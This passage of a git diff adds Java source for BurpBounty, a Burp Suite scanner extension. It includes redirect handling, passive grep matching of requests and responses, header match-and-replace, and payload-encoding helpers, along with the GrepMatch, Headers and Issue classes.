+ while (loop != maxredirect + 1) {
+ IHttpRequestResponse redirectRequestResponse = requestResponse;
+ try {
+ r = helpers.analyzeResponse(redirectRequestResponse.getResponse());
+ } catch (NullPointerException e) {
+ break;
+ }
+ responseCode = new Integer(r.getStatusCode());
+ if (responseCodes.contains(responseCode)) {
+
+ if (isResponseCode(responsecode, negativerc, responseCode) || !iscontenttype && isContentType(contenttype, negativect, r)) {
+ for (String grep : greps) {
+ matches = gm.getResponseMatches(requestResponse, payload, grep, issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, charstourlencode, matchtype,
+ issueseverity, issueconfidence, notresponse, casesensitive, urlencode, excludeHTTP, onlyHTTP);
+
+ if (matches != null) {
+ issues.add(matches);
+ }
+ }
+ }
+ redirectRequestResponse = getRedirection(redirectRequestResponse, payload, httpService);
+
+ if (redirectRequestResponse == null) {
+ break;
+ }
+
+ requestResponse.setResponse(redirectRequestResponse.getResponse());
+
+ } else {
+ if (isResponseCode(responsecode, negativerc, responseCode) || !iscontenttype && isContentType(contenttype, negativect, r)) {
+ for (String grep : greps) {
+ matches = gm.getResponseMatches(requestResponse, payload, grep, issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, charstourlencode, matchtype,
+ issueseverity, issueconfidence, notresponse, casesensitive, urlencode, excludeHTTP, onlyHTTP);
+
+ if (matches != null) {
+ issues.add(matches);
+ }
+ }
+ }
+ break;
+ }
+ loop += 1;
+ }
+ }
+ }
+ }
+ }
+ }
+
+ if (issues.size() > 0) {
+ return issues;
+ }
+ return null;
+ }
+
+ public List runPScan(IHttpRequestResponse baseRequestResponse) throws Exception {
+
+ List issues = new ArrayList<>();
+
+ for (int i = 0; i < this.data.size(); i++) {
+ Object idata = this.data.get(i);
+ issue = gson.fromJson(idata.toString(), Issue.class);;
+
+ scanner = issue.getScanner();
+ //if example scanner or active scanner...continue.
+ if (scanner == 0 || scanner == 1 || !issue.getActive()) {
+ continue;
+ }
+
+ greps = issue.getGreps();
+ issuename = issue.getIssueName();
+ issueseverity = issue.getIssueSeverity();
+ issueconfidence = issue.getIssueConfidence();
+ issuedetail = issue.getIssueDetail();
+ issuebackground = issue.getIssueBackground();
+ remediationdetail = issue.getRemediationDetail();
+ remediationbackground = issue.getRemediationBackground();
+ matchtype = issue.getMatchType();
+ notresponse = issue.getNotResponse();
+ casesensitive = issue.getCaseSensitive();
+ iscontenttype = issue.getIsContentType();
+ isresponsecode = issue.getIsResponseCode();
+ contenttype = issue.getContentType();
+ responsecode = issue.getResponseCode();
+ excludeHTTP = issue.getExcludeHTTP();
+ onlyHTTP = issue.getOnlyHTTP();
+ negativect = issue.getNegativeCT();
+ negativerc = issue.getNegativeRC();
+
+ GrepMatch gm = new GrepMatch(callbacks);
+
+ if (scanner == 2) {//passive response
+ for (String grep : greps) {
+ if (baseRequestResponse == null) {
+ break;
+ }
+ IResponseInfo r;
+ try {
+ r = helpers.analyzeResponse(baseRequestResponse.getResponse());
+ } catch (NullPointerException e) {
+ break;
+ }
+ Integer responseCode = new Integer(r.getStatusCode());
+
+ IScanIssue matches = null;
+ if (isResponseCode(responsecode, negativerc, responseCode) || !iscontenttype && isContentType(contenttype, negativect, r)) {
+ matches = gm.getResponseMatches(baseRequestResponse, "", grep, issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, "", matchtype,
+ issueseverity, issueconfidence, notresponse, casesensitive, false, excludeHTTP, onlyHTTP);
+ }
+
+ if (matches != null) {
+ issues.add(matches);
+ }
+ }
+ } else if (scanner == 3) {//passive request
+ for (String grep : greps) {
+ if (baseRequestResponse == null) {
+ return null;
+ }
+
+ IScanIssue matches;
+ matches = gm.getRequestMatches(baseRequestResponse, grep, issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, matchtype,
+ issueseverity, issueconfidence, casesensitive, notresponse, excludeHTTP, onlyHTTP);
+
+ if (matches != null) {
+ issues.add(matches);
+ }
+ }
+ }
+ }
+ if (issues.size() > 0) {
+ return issues;
+ }
+ return null;
+ }
+
+ public IHttpRequestResponse Redirection(IHttpRequestResponse response, URL url, String payload) {
+ try {
+ byte[] checkRequest = helpers.buildHttpRequest(url);
+ boolean https = false;
+
+ if (url.getProtocol().equals("https")) {
+ https = true;
+ }
+
+ Integer port = 0;
+ if (url.getPort() == -1) {
+ port = url.getDefaultPort();
+ }
+
+ checkRequest = getMatchAndReplace(headers, checkRequest, payload);
+
+ IHttpService newrequest = helpers.buildHttpService(url.getHost(), port, https);
+ response = callbacks.makeHttpRequest(newrequest, checkRequest);
+ } catch (IndexOutOfBoundsException | IllegalArgumentException e) {
+ System.out.println("Error in redirection request: " + e.getMessage());
+ return null;
+ } catch (RuntimeException e) {
+ System.out.println("Error in redirection request: " + e.getMessage());
+ return null;
+ }
+
+ return response;
+ }
+
+ public IHttpRequestResponse getRedirection(IHttpRequestResponse response, String payload, IHttpService httpService) {
+
+ try{
+ URL url = getLocation(httpService, response);
+
+ if (redirtype == 2) {
+ if (url.getHost().contains(httpService.getHost())) {
+ return Redirection(response, url, payload);
+ }
+ } else if (redirtype == 3) {
+ boolean isurl = callbacks.isInScope(url);
+ if (isurl) {
+ return Redirection(response, url, payload);
+ }
+ }else{
+ return Redirection(response, url, payload);
+ }
+ return null;
+ } catch (NullPointerException | ArrayIndexOutOfBoundsException ex) {
+ return null;
+ }
+ }
+
+ public byte[] getMatchAndReplace(List headers, byte[] checkRequest, String payload) {
+ String tempRequest = helpers.bytesToString(checkRequest);
+
+ if (!headers.isEmpty()) {
+ for (int x = 0; x < headers.size(); x++) {
+ String replace = headers.get(x).replace;
+ if (headers.get(x).type.equals("Request")) {
+ if (headers.get(x).regex.equals("String")) {
+ if (replace.contains("{PAYLOAD}")) {
+ replace = replace.replace("{PAYLOAD}", payload);
+ }
+ if (headers.get(x).match.isEmpty()) {
+ tempRequest = tempRequest.replace("\r\n\r\n", "\r\n" + replace + "\r\n\r\n");
+ } else {
+ tempRequest = tempRequest.replace(headers.get(x).match, replace);
+ }
+ } else {
+ if (replace.contains("{PAYLOAD}")) {
+ replace = replace.replaceAll("\\{PAYLOAD\\}", payload);
+ }
+ if (headers.get(x).match.isEmpty()) {
+ tempRequest = tempRequest.replaceAll("\\r\\n\\r\\n", "\r\n" + replace + "\r\n\r\n");
+ } else {
+ tempRequest = tempRequest.replaceAll(headers.get(x).match, replace);
+ }
+ }
+
+ }
+ }
+ }
+ return helpers.stringToBytes(tempRequest);
+ }
+
+ public URL getLocation(IHttpService httpService, IHttpRequestResponse response) {
+ try {
+ IResponseInfo response_info = helpers.analyzeResponse(response.getResponse());
+ String[] host = null;
+ String Location = "";
+ URL url;
+ String regex = "(www)?([a-zA-Z0-9]+).[a-zA-Z0-9]*.[a-z]{3}.*";
+ Pattern p = Pattern.compile(regex);
+
+ for (String header : response_info.getHeaders()) {
+ if (header.toUpperCase().contains("LOCATION")) {
+
+ host = header.split("\\s+");
+ Location = host[1];
+
+ }
+ }
+
+ Matcher m = p.matcher(Location);
+ if (host[1].startsWith("http://") || host[1].startsWith("https://")) {
+ url = new URL(Location);
+ return url;
+ } else if (!host[1].startsWith("/") && m.find()) {
+ url = new URL("http://" + Location);
+ return url;
+ } else {
+ url = new URL(httpService.getProtocol() + "://" + httpService.getHost() + Location);
+ return url;
+ }
+
+ } catch (MalformedURLException | NullPointerException | ArrayIndexOutOfBoundsException ex) {
+ return null;
+ }
+ }
+
+ public int getContentLength(IHttpRequestResponse response) {
+ IResponseInfo response_info;
+ try {
+ response_info = helpers.analyzeResponse(response.getResponse());
+ } catch (NullPointerException ex) {
+ return 0;
+ }
+
+ int ContentLength = 0;
+
+ for (String headers : response_info.getHeaders()) {
+ if (headers.toUpperCase().contains("CONTENT-LENGTH:")) {
+ ContentLength = Integer.parseInt(headers.split("\\s+")[1]);
+ }
+ }
+ return ContentLength;
+ }
+
+ public boolean isResponseCode(String responsecodes, boolean negativerc, Integer responsecode) {
+
+ boolean iscode = true;
+
+ if (responsecodes.equals("")) {
+ return iscode;
+ }
+ List items = Arrays.asList(responsecodes.split("\\s*,\\s*"));
+
+ for (String i : items) {
+ int code = Integer.parseInt(i);
+ if (code != responsecode && !negativerc) {
+ iscode = false;
+ } else if (code != responsecode && negativerc) {
+ iscode = true;
+ break;
+ } else if (code == responsecode && !negativerc) {
+ iscode = true;
+ break;
+ } else if (code == responsecode && negativerc) {
+ iscode = false;
+ break;
+ }
+ }
+
+ return iscode;
+ }
+
+ public boolean isContentType(String contenttype, boolean negativect, IResponseInfo r) {
+ List HEADERS = r.getHeaders();
+ boolean isct = true;
+ if (contenttype.isEmpty()) {
+ return isct;
+ }
+ List items = Arrays.asList(contenttype.split("\\s*,\\s*"));
+
+ for (String i : items) {
+ for (String header : HEADERS) {
+ if (header.toUpperCase().contains("CONTENT-TYPE") && !header.toUpperCase().contains(i.toUpperCase()) && !negativect) {
+ isct = false;
+ } else if (header.toUpperCase().contains("CONTENT-TYPE") && !header.toUpperCase().contains(i.toUpperCase()) && negativect) {
+ isct = true;
+ break;
+ } else if (header.toUpperCase().contains("CONTENT-TYPE") && header.toUpperCase().contains(i.toUpperCase()) && !negativect) {
+ isct = true;
+ break;
+ } else if (header.toUpperCase().contains("CONTENT-TYPE") && header.toUpperCase().contains(i.toUpperCase()) && negativect) {
+ isct = false;
+ break;
+ }
+ }
+ }
+ return isct;
+ }
+
+ public List processPayload(List payloads, List encoders) {
+ List pay = new ArrayList();
+ for (String payload : payloads) {
+
+ for (String p : encoders) {
+ switch (p) {
+ case "URL-encode key characters":
+ payload = encodeKeyURL(payload);
+ break;
+ case "URL-encode all characters":
+ payload = encodeURL(payload);
+ break;
+ case "URL-encode all characters (Unicode)":
+ payload = encodeUnicodeURL(payload);
+ break;
+ case "HTML-encode key characters":
+ payload = encodeKeyHTML(payload);
+ break;
+ case "HTML-encode all characters":
+ payload = encodeHTML(payload);
+ break;
+ case "Base64-encode":
+ payload = helpers.base64Encode(payload);
+ default:
+ break;
+ }
+ }
+ pay.add(payload);
+ }
+
+ return pay;
+ }
+
+ public static String encodeURL(String s) {
+ StringBuffer out = new StringBuffer();
+ for (int i = 0; i < s.length(); i++) {
+ char c = s.charAt(i);
+ out.append("%" + Integer.toHexString((int) c));
+ }
+ return out.toString();
+ }
+
+ public static String encodeUnicodeURL(String s) {
+ StringBuffer out = new StringBuffer();
+ for (int i = 0; i < s.length(); i++) {
+ char c = s.charAt(i);
+ out.append("%u00" + Integer.toHexString((int) c));
+ }
+ return out.toString();
+ }
+
+ public static String encodeHTML(String s) {
+ StringBuffer out = new StringBuffer();
+ for (int i = 0; i < s.length(); i++) {
+ char c = s.charAt(i);
+ out.append("&#x" + Integer.toHexString((int) c) + ";");
+ }
+ return out.toString();
+ }
+
+ public static String encodeKeyHTML(String s) {
+ StringBuffer out = new StringBuffer();
+ String key = "\\<\\(\\[\\\\\\^\\-\\=\\$\\!\\|\\]\\)\\?\\*\\+\\.\\>]\\&\\%\\:\\@ ";
+ for (int i = 0; i < s.length(); i++) {
+ char c = s.charAt(i);
+ if (key.contains(s.substring(i, i + 1))) {
+ out.append("&#x" + Integer.toHexString((int) c) + ";");
+ } else {
+ out.append(c);
+ }
+ }
+ return out.toString();
+ }
+
+ public static String encodeKeyURL(String s) {
+ StringBuffer out = new StringBuffer();
+ String key = "\\<\\(\\[\\\\\\^\\-\\=\\$\\!\\|\\]\\)\\?\\*\\+\\.\\>]\\&\\%\\:\\@ ";
+ for (int i = 0; i < s.length(); i++) {
+ char c = s.charAt(i);
+ if (key.contains(s.substring(i, i + 1))) {
+ out.append("%" + Integer.toHexString((int) c));
+ } else {
+ out.append(c);
+ }
+ }
+ return out.toString();
+ }
+
+ public static String encodeTheseURL(String s, String characters) {
+ StringBuffer out = new StringBuffer();
+ for (int i = 0; i < s.length(); i++) {
+ char c = s.charAt(i);
+ if (characters.indexOf(c) >= 0) {
+ out.append("%" + Integer.toHexString((int) c));
+ } else {
+ out.append(c);
+ }
+ }
+ return out.toString();
+ }
+
+}
diff --git a/src/GrepMatch.java b/src/GrepMatch.java
new file mode 100644
index 0000000..5e3eff1
--- /dev/null
+++ b/src/GrepMatch.java
@@ -0,0 +1,350 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import burp.IBurpExtenderCallbacks;
+import burp.IExtensionHelpers;
+import burp.IHttpRequestResponse;
+import burp.IResponseInfo;
+import burp.IRequestInfo;
+import burp.IScanIssue;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+import java.util.regex.PatternSyntaxException;
+
+public class GrepMatch {
+
+ private IBurpExtenderCallbacks callbacks;
+ private IExtensionHelpers helpers;
+ String issuename;
+ String issuedetail;
+ String issuebackground;
+ String remediationdetail;
+ String remediationbackground;
+ int scanner;
+ int matchtype;
+ String issueseverity;
+ String issueconfidence;
+ boolean notresponse;
+ boolean excludeHTTP;
+ boolean onlyHTTP;
+ boolean casesensitive;
+ boolean iscontenttype;
+ boolean isresponsecode;
+ String contenttype;
+ String responsecode;
+ List greps;
+
+ public GrepMatch(IBurpExtenderCallbacks callbacks) {
+
+ this.callbacks = callbacks;
+ this.helpers = callbacks.getHelpers();
+ greps = new ArrayList();
+ issuename = "";
+ issuedetail = "";
+ issuebackground = "";
+ remediationdetail = "";
+ remediationbackground = "";
+ scanner = 0;
+ matchtype = 0;
+ issueseverity = "";
+ issueconfidence = "";
+ notresponse = false;
+ excludeHTTP = false;
+ onlyHTTP = false;
+ casesensitive = false;
+ iscontenttype = false;
+ isresponsecode = false;
+ contenttype = "";
+ responsecode = "";
+
+ }
+
+ public IScanIssue getResponseMatches(IHttpRequestResponse requestResponse, String payload, String grep, String issuename, String issuedetail, String issuebackground,
+ String remediationdetail, String remediationbackground, String charstourlencode, int matchtype, String issueseverity, String issueconfidence, boolean notresponse,
+ boolean casesensitive, boolean urlencode, boolean excludeHTTP, boolean onlyHTTP) {
+
+ String responseString;
+ String headers = "";
+ Pattern p;
+ Matcher m;
+ IResponseInfo responseInfo = helpers.analyzeResponse(requestResponse.getResponse());
+ byte[] request = requestResponse.getRequest();
+
+ if (casesensitive || matchtype == 2) {
+ responseString = helpers.bytesToString(requestResponse.getResponse());
+ for (String header : responseInfo.getHeaders()) {
+ headers += header + "\r\n";
+ }
+ } else {
+ responseString = helpers.bytesToString(requestResponse.getResponse()).toUpperCase();
+ grep = grep.toUpperCase();
+ for (String header : responseInfo.getHeaders()) {
+ headers += header.toUpperCase() + "\r\n";
+ }
+ }
+
+ if (matchtype == 2) {
+ List responseMarkers = new ArrayList();
+ List requestMarkers = new ArrayList();
+ String matches = "
";
+ //Start regex grep
+ int beginAt = 0;
+
+ try {
+ if (excludeHTTP && !onlyHTTP) {
+ beginAt = responseInfo.getBodyOffset();
+ p = Pattern.compile(grep);
+ m = p.matcher(responseString);
+ } else if (!excludeHTTP && onlyHTTP) {
+ p = Pattern.compile(grep);
+ m = p.matcher(headers);
+ } else {
+ p = Pattern.compile(grep);
+ m = p.matcher(responseString);
+ }
+ } catch (PatternSyntaxException pse) {
+ callbacks.printError("Incorrect regex: " + pse.getPattern());
+ return null;
+ }
+
+ if (!payload.equals("")) {
+ int start = 0;
+ byte[] match = helpers.stringToBytes(payload);
+ while (start < request.length) {
+ start = helpers.indexOf(request, match, false, start, request.length);
+ if (start == -1) {
+ break;
+ }
+ requestMarkers.add(new int[]{start, start + match.length});
+ start += match.length;
+ }
+ }
+
+ if (notresponse) {
+ if (!m.find(beginAt)) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+
+ } else {
+ while (m.find(beginAt)) {
+ responseMarkers.add(new int[]{m.start(), m.end()});
+ matches = matches + m.group().toLowerCase() + "
";
+ beginAt = m.end();
+ }
+
+ if (!responseMarkers.isEmpty()) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, responseMarkers)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(matches)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+ }
+ //End regex grep
+ //Start Simple String, payload in response and payload without encode
+ } else {
+
+ List responseMarkers = new ArrayList();
+ List requestMarkers = new ArrayList();
+ int beginAt = 0;
+ byte[] response = helpers.stringToBytes(responseString);
+
+ if (excludeHTTP && !onlyHTTP) {
+ beginAt = responseInfo.getBodyOffset();
+ } else if (!excludeHTTP && onlyHTTP) {
+ response = helpers.stringToBytes(headers);
+ }
+
+ if (!payload.equals("")) {
+ int start = 0;
+ byte[] match = helpers.stringToBytes(payload);
+ while (start < request.length) {
+ start = helpers.indexOf(request, match, false, start, request.length);
+ if (start == -1) {
+ break;
+ }
+ requestMarkers.add(new int[]{start, start + match.length});
+ start += match.length;
+ }
+ }
+
+ if (notresponse) {
+ if (!responseString.contains(grep)) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+
+ } else {
+
+ byte[] match = helpers.stringToBytes(grep);
+
+ while (beginAt < response.length) {
+ beginAt = helpers.indexOf(response, match, false, beginAt, response.length);
+ if (beginAt == -1) {
+ break;
+ }
+ responseMarkers.add(new int[]{beginAt, beginAt + match.length});
+ beginAt += match.length;
+ }
+
+ if (!responseMarkers.isEmpty()) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, responseMarkers)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+ }
+ //End Simple String, payload in response and payload without encode
+ }
+ }
+
+ public IScanIssue getRequestMatches(IHttpRequestResponse requestResponse, String grep, String issuename, String issuedetail, String issuebackground,
+ String remediationdetail, String remediationbackground, int matchtype, String issueseverity, String issueconfidence, boolean casesensitive, boolean notresponse,
+ boolean excludeHTTP, boolean onlyHTTP) {
+
+ if (requestResponse.getRequest() == null) {
+ return null;
+ }
+
+ String requestString;
+ String headers = "";
+ Pattern p;
+ Matcher m;
+ byte[] request = requestResponse.getRequest();
+ IRequestInfo requestInfo = helpers.analyzeRequest(requestResponse.getRequest());
+
+ if (casesensitive || matchtype == 2) {
+ requestString = helpers.bytesToString(requestResponse.getRequest());
+ for (String header : requestInfo.getHeaders()) {
+ headers += header + "\r\n";
+ }
+ } else {
+ requestString = helpers.bytesToString(requestResponse.getRequest()).toUpperCase();
+ grep = grep.toUpperCase();
+ for (String header : requestInfo.getHeaders()) {
+ headers += header.toUpperCase() + "\r\n";
+ }
+ }
+
+ if (matchtype == 2) {
+ List requestMarkers = new ArrayList();
+ String matches = "
";
+ //Start regex grep
+ int beginAt = 0;
+ try {
+ if (excludeHTTP && !onlyHTTP) {
+ beginAt = requestInfo.getBodyOffset();
+ p = Pattern.compile(grep);
+ m = p.matcher(requestString);
+ } else if (!excludeHTTP && onlyHTTP) {
+ p = Pattern.compile(grep);
+ m = p.matcher(headers);
+ } else {
+ p = Pattern.compile(grep);
+ m = p.matcher(requestString);
+ }
+ } catch (PatternSyntaxException pse) {
+ callbacks.printError("Incorrect regex: " + pse.getPattern());
+ return null;
+ }
+
+ if (notresponse) {
+ if (!m.find(beginAt)) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(grep)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+
+ } else {
+ while (m.find(beginAt)) {
+ requestMarkers.add(new int[]{m.start(), m.end()});
+ matches = matches + m.group().toLowerCase() + "
";
+ beginAt = m.end();
+ }
+
+ if (!requestMarkers.isEmpty()) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(matches)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+ }
+ //End regex grep
+ //Start Simple String, payload in response and payload without encode
+ } else {
+ List requestMarkers = new ArrayList();
+ int beginAt = 0;
+
+ if (excludeHTTP && !onlyHTTP) {
+ beginAt = requestInfo.getBodyOffset();
+ } else if (!excludeHTTP && onlyHTTP) {
+ request = helpers.stringToBytes(headers);
+ }
+
+ if (notresponse) {
+ if (!requestString.contains(grep)) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(grep)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+
+ } else {
+ byte[] match = helpers.stringToBytes(grep);
+ while (beginAt < request.length) {
+ beginAt = helpers.indexOf(request, match, false, beginAt, request.length);
+ if (beginAt == -1) {
+ break;
+ }
+ requestMarkers.add(new int[]{beginAt, beginAt + match.length});
+ beginAt += match.length;
+ }
+
+ if (!requestMarkers.isEmpty()) {
+ return new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(grep)),
+ issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ } else {
+ return null;
+ }
+ }
+ //End Simple String, payload and payload without encode
+ }
+ }
+}
diff --git a/src/Headers.java b/src/Headers.java
new file mode 100644
index 0000000..b17bb4a
--- /dev/null
+++ b/src/Headers.java
@@ -0,0 +1,34 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+public class Headers {
+
+ String type;
+ String match;
+ String replace;
+ String regex;
+ String comment;
+
+ Headers(String type, String match, String replace, String regex, String comment) {
+ this.type = type;
+ this.match = match;
+ this.replace = replace;
+ this.regex = regex;
+ this.comment = comment;
+ }
+
+}
diff --git a/src/Issue.java b/src/Issue.java
new file mode 100644
index 0000000..de9d2eb
--- /dev/null
+++ b/src/Issue.java
@@ -0,0 +1,457 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import java.util.List;
+
+public class Issue {
+
+ private String Name;
+ private boolean Active;
+ private int Scanner;
+ private String Author;
+ private List Payloads;
+ private List Encoder;
+ private boolean UrlEncode;
+ private String CharsToUrlEncode;
+ private List Grep;
+ private List Tags;
+ private boolean PayloadResponse;
+ private boolean NotResponse;
+ private String TimeOut;
+ private boolean isTime;
+ private String contentLength;
+ private boolean iscontentLength;
+ private boolean CaseSensitive;
+ private boolean ExcludeHTTP;
+ private boolean OnlyHTTP;
+ private boolean IsContentType;
+ private String ContentType;
+ private boolean NegativeCT;
+ private boolean IsResponseCode;
+ private String ResponseCode;
+ private boolean NegativeRC;
+ private int MatchType;
+ private int RedirType;
+ private int MaxRedir;
+ private int payloadPosition;
+ private String payloadsFile;
+ private String grepsFile;
+ private String IssueName;
+ private String IssueSeverity;
+ private String IssueConfidence;
+ private String IssueDetail;
+ private String RemediationDetail;
+ private String IssueBackground;
+ private String RemediationBackground;
+ private List Header;
+ private List VariationAttributes;
+ private List InsertionPointType;
+ private boolean pathDiscovery;
+
+ public Issue() {
+ super();
+ }
+
+ public Issue(String name, int scanner, boolean active, List payloads, List encoder, String charstourlencode, List grep, List tags, boolean casesensitive, boolean urlencode,
+ boolean payloadresponse, boolean notresponse, boolean onlyHTTP, boolean excludeHTTP, boolean iscontenttype, String contenttype, boolean negativect,
+ boolean isresponsecode, String responsecode, boolean negativerc, int matchtype, int redirtype, boolean spaceencode, String sencode, String timeout,
+ boolean isreplace, String replace1, String replace2, String author, boolean istime, int payloadposition, int maxredir, String payloadsfile, String grepsfile, String issuetype, String issuename, String issueseverity, String issueconfidence,
+ String issuedetail, String issuebackground, String remediationdetail, String remediationbackground, boolean iscontentlength, String contentlength, List header, List variationAttributes, List insertionPointType, boolean pathdiscovery) {
+ super();
+ Name = name;
+ Active = active;
+ Scanner = scanner;
+ Author = author;
+ Payloads = payloads;
+ Encoder = encoder;
+ Grep = grep;
+ Tags = tags;
+ CaseSensitive = casesensitive;
+ PayloadResponse = payloadresponse;
+ NotResponse = notresponse;
+ ExcludeHTTP = excludeHTTP;
+ OnlyHTTP = onlyHTTP;
+ IsContentType = iscontenttype;
+ ContentType = contenttype;
+ NegativeCT = negativect;
+ IsResponseCode = isresponsecode;
+ ResponseCode = responsecode;
+ NegativeRC = negativerc;
+ MatchType = matchtype;
+ IssueName = issuename;
+ IssueSeverity = issueseverity;
+ IssueConfidence = issueconfidence;
+ IssueDetail = issuedetail;
+ IssueBackground = issuebackground;
+ RemediationDetail = remediationdetail;
+ RemediationBackground = remediationbackground;
+ UrlEncode = urlencode;
+ CharsToUrlEncode = charstourlencode;
+ RedirType = redirtype;
+ payloadsFile = payloadsfile;
+ grepsFile = grepsfile;
+ MaxRedir = maxredir;
+ payloadPosition = payloadposition;
+ TimeOut = timeout;
+ isTime = istime;
+ contentLength = contentlength;
+ iscontentLength = iscontentlength;
+ Header = header;
+ VariationAttributes = variationAttributes;
+ InsertionPointType = insertionPointType;
+ pathDiscovery = pathdiscovery;
+
+ }
+
+ public String getName() {
+ return Name;
+ }
+
+ public List getHeader() {
+ return Header;
+ }
+
+ public List getVariationAttributes() {
+ return VariationAttributes;
+ }
+
+ public List getInsertionPointType() {
+ return InsertionPointType;
+ }
+
+ public String getAuthor() {
+ return Author;
+ }
+
+ public boolean getActive() {
+ return Active;
+ }
+
+ public int getScanner() {
+ return Scanner;
+ }
+
+ public int getPayloadPosition() {
+ return payloadPosition;
+ }
+
+ public List getPayloads() {
+ return Payloads;
+ }
+
+ public List getEncoder() {
+ return Encoder;
+ }
+
+ public String getCharsToUrlEncode() {
+ return CharsToUrlEncode;
+ }
+
+ public String getpayloadsFile() {
+ return payloadsFile;
+ }
+
+ public String getgrepsFile() {
+ return grepsFile;
+ }
+
+ public List getGreps() {
+ return Grep;
+ }
+
+ public List getTags() {
+ return Tags;
+ }
+
+ public boolean getCaseSensitive() {
+ return CaseSensitive;
+ }
+
+ public boolean getPayloadResponse() {
+ return PayloadResponse;
+ }
+
+ public boolean getNotResponse() {
+ return NotResponse;
+ }
+
+ public boolean getExcludeHTTP() {
+ return ExcludeHTTP;
+ }
+
+ public boolean getOnlyHTTP() {
+ return OnlyHTTP;
+ }
+
+ public boolean getIsContentType() {
+ return IsContentType;
+ }
+
+ public String getContentType() {
+ return ContentType;
+ }
+
+ public String getTime() {
+ return TimeOut;
+ }
+
+ public boolean getIsTime() {
+ return isTime;
+ }
+
+ public boolean getPathDiscover() {
+ return pathDiscovery;
+ }
+
+ public String getContentLength() {
+ return contentLength;
+ }
+
+ public boolean getIsContentLength() {
+ return iscontentLength;
+ }
+
+ public boolean getNegativeCT() {
+ return NegativeCT;
+ }
+
+ public boolean getIsResponseCode() {
+ return IsResponseCode;
+ }
+
+ public String getResponseCode() {
+ return ResponseCode;
+ }
+
+ public boolean getNegativeRC() {
+ return NegativeRC;
+ }
+
+ public boolean getUrlEncode() {
+ return UrlEncode;
+ }
+
+ public int getMatchType() {
+ return MatchType;
+ }
+
+ public int getRedirection() {
+ return RedirType;
+ }
+
+ public int getMaxRedir() {
+ return MaxRedir;
+ }
+
+ public String getIssueName() {
+ return IssueName;
+ }
+
